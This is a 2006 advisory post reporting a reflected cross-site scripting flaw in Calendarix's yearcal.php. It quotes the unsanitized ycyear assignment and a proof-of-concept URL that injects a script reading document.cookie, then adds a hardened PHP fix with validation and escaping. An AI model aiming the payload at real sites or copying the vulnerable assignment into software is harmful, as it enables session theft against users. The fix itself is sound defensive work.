Related information
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
- PHPGraphy <= 0.9.11 "editwelcome" unauthorized access / cross site scripting -
PhpWebFTP 3.2 Login Script
MyEvent Remote File Execution And XSS Attacking
FlexBB v0.5.5 BETA [SQL Inj] [XSS] [Login bypass]

From: botan_(at)_linuxmail.org <botan_(at)_linuxmail.org>
Date: 17.04.2006
Subject: Calendarix "yearcal.php" XSS Attacking

Website : http://www.calendarix.com

Vulnerable :

if (!isset($_GET['ycyear'])) $ycyear = $y ;
else $ycyear = $_GET['ycyear'];

http://www.site.com/[path]/yearcal.php?ycyear=<script>alert(document.cookie)</script>
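
A hardened form of the assignment quoted in the advisory, as an added example that is not part of the original message or of Calendarix's code. It assumes `$ycyear` is later written into the page; the function names, the year range and the `<h2>` output line are hypothetical.

```php
<?php
// Added example, not Calendarix code. $y (the default year) mirrors the
// variable in the advisory snippet; everything else is an assumption.

/**
 * Return ycyear from the query string as an integer inside [$min, $max],
 * or $default when it is absent, not a scalar string, or not a plain year.
 */
function ycyear_from_request(array $query, int $default,
                             int $min = 1970, int $max = 2100): int
{
    if (!isset($query['ycyear']) || !is_string($query['ycyear'])) {
        return $default;            // missing, or an array such as ?ycyear[]=x
    }
    $year = filter_var($query['ycyear'], FILTER_VALIDATE_INT,
        ['options' => ['min_range' => $min, 'max_range' => $max]]);
    return $year === false ? $default : $year;
}

/** Escape a value for an HTML text or attribute context. */
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

$y = (int) date('Y');

// Replacement for the two vulnerable lines: validate on input ...
$ycyear = ycyear_from_request($_GET, $y);
// ... and still escape on output, so a later change to the validation
// cannot reintroduce the reflection (hypothetical output line).
echo '<h2>Calendar for ', h((string) $ycyear), "</h2>\n";

// Constructed sample query strings, including the one from the advisory.
$samples = [
    ['ycyear' => '2006'],
    ['ycyear' => '<script>alert(document.cookie)</script>'],
    ['ycyear' => '2006"><b>'],
    ['ycyear' => ['2006']],
    ['ycyear' => '99999'],
    [],
];
foreach ($samples as $q) {
    printf("%-60s => %d\n", json_encode($q), ycyear_from_request($q, $y));
}
```

Only the first sample is accepted as given; every other input falls back to `$y`, so no request-controlled markup reaches the response.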